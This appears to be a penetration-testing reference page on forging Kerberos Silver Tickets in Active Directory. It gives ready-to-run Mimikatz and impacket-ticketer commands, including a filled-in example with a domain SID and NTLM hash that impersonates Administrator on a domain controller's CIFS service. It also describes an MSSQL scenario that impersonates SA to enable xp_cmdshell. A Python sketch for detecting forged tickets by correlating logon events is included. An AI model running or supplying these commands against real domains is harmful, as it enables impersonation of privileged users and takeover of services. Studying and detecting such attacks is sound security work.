Silver ticket

The Silver Ticket attack is based on crafting a valid TGS for a service once the NTLM hash of the service account is known (for example, the computer account hash). It is then possible to gain access to that service by forging a custom TGS as any user.

Information needed to create a silver ticket

  • Domain Name

  • Domain SID

  • Username to impersonate

  • Service account NTLM hash

Generating a silver ticket

Invoke-Mimikatz -Command '"kerberos::golden /domain:[domain] /sid:[domain sid] /target:[target computer] /service:[service] /rc4:[service account hash/machine account hash] /user:[impersonating user] /ptt"'

The machine account (the computer account whose name ends in $) can be used as the service account:

Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorpdc.dollarcorp.moneycorp.local /service:CIFS /rc4:6f5b5acaf7433b3282ac22e21e62ff22 /user:Administrator /ptt"'

Scenarios

Service accounts (accounts tied to SPNs) are powerful targets: if someone compromises one, they can use a silver ticket to impersonate any user in the context of that service.

There is a flaw here. If someone is able to get access to the service's master key, they can craft a ticket with any content, because the target service trusts the ticket's contents as long as it can decrypt it successfully. This is possible because the service never checks back with the DC to verify that the ticket actually came from the DC.

And this is basically what silver tickets are: if you can get access to the password or NTLM hash of the account a service runs under, you can forge a ticket and become any user in the context of that application.
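The detection angle follows directly from the flaw described above: a forged service ticket is decrypted by the service itself and never passes through the DC, so the target host records a Kerberos network logon (event 4624, logon type 3) for which no DC ever recorded a TGS request (event 4769). The following Python sketch is an added example and not part of the original page; it assumes 4769 events from every DC are collected in one place, and the event records and field names below are constructed and simplified from the real 4769/4624 fields.

```python
from datetime import datetime, timedelta

# Constructed sample events (not real logs). 4769 = service ticket request as logged
# on the DC; 4624 = logon recorded on the target host (logon type 3, Kerberos package).
DC_4769 = [
    {"time": "2024-05-01T09:00:05", "user": "alice", "service": "DCORPDC$", "client": "10.0.0.21"},
    {"time": "2024-05-01T09:10:00", "user": "bob", "service": "DCORPDC$", "client": "10.0.0.22"},
]
HOST_4624 = [
    {"time": "2024-05-01T09:00:07", "user": "alice", "host": "DCORPDC$", "logon_type": 3, "package": "Kerberos", "src": "10.0.0.21"},
    {"time": "2024-05-01T09:10:02", "user": "bob", "host": "DCORPDC$", "logon_type": 3, "package": "Kerberos", "src": "10.0.0.22"},
    # Kerberos logon as Administrator with no 4769 anywhere on the DC: the ticket was never issued.
    {"time": "2024-05-01T14:00:00", "user": "Administrator", "host": "DCORPDC$", "logon_type": 3, "package": "Kerberos", "src": "10.0.0.99"},
    # NTLM logons are out of scope for this check (no service ticket involved).
    {"time": "2024-05-01T14:05:00", "user": "carol", "host": "DCORPDC$", "logon_type": 3, "package": "NTLM", "src": "10.0.0.23"},
]


def _ts(value):
    return datetime.fromisoformat(value)


def find_unrequested_kerberos_logons(host_4624, dc_4769, max_age=timedelta(hours=10)):
    """Return host logons that presented a Kerberos service ticket the DC never issued.

    A legitimately issued ticket can be cached and reused, so a 4769 for the same user
    and service up to max_age (the default ticket lifetime) before the logon counts as
    a match. A gap in DC log collection will surface here as a false positive, so
    treat hits as leads for correlation rather than proof of a forged ticket.
    """
    suspicious = []
    for logon in host_4624:
        if logon["logon_type"] != 3 or logon["package"] != "Kerberos":
            continue  # only network logons authenticated with a service ticket
        when = _ts(logon["time"])
        issued = any(
            req["user"].lower() == logon["user"].lower()
            and req["service"].lower() == logon["host"].lower()
            and when - max_age <= _ts(req["time"]) <= when
            for req in dc_4769
        )
        if not issued:
            suspicious.append(logon)
    return suspicious


if __name__ == "__main__":
    for hit in find_unrequested_kerberos_logons(HOST_4624, DC_4769):
        print(f"{hit['time']} {hit['user']} -> {hit['host']} from {hit['src']}: no matching 4769 on DC")
```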

MSSQL Server

Assume you are targeting an MSSQL database. After compromising the service account (the account tied to the SPN), you can craft a Silver Ticket that impersonates the SA user and use it to enable and execute xp_cmdshell.

To create a silver ticket, you can use either impacket's ticketer.py or mimikatz. In both cases you will need the password or NTLM hash of the account the application or database runs under. This is the machine account if virtual accounts are used, or a dedicated service account; in the latter case you might be able to kerberoast and crack the password.

Impacket-Ticketer.py

impacket-ticketer -nthash <ntlm hash> -domain-sid <sid> -domain <domain> -spn <spn> -user-id <id> <username>

Then point KRB5CCNAME at the resulting credential cache so that Kerberos-aware tools use the forged ticket:

export KRB5CCNAME=user.ccache

Available services
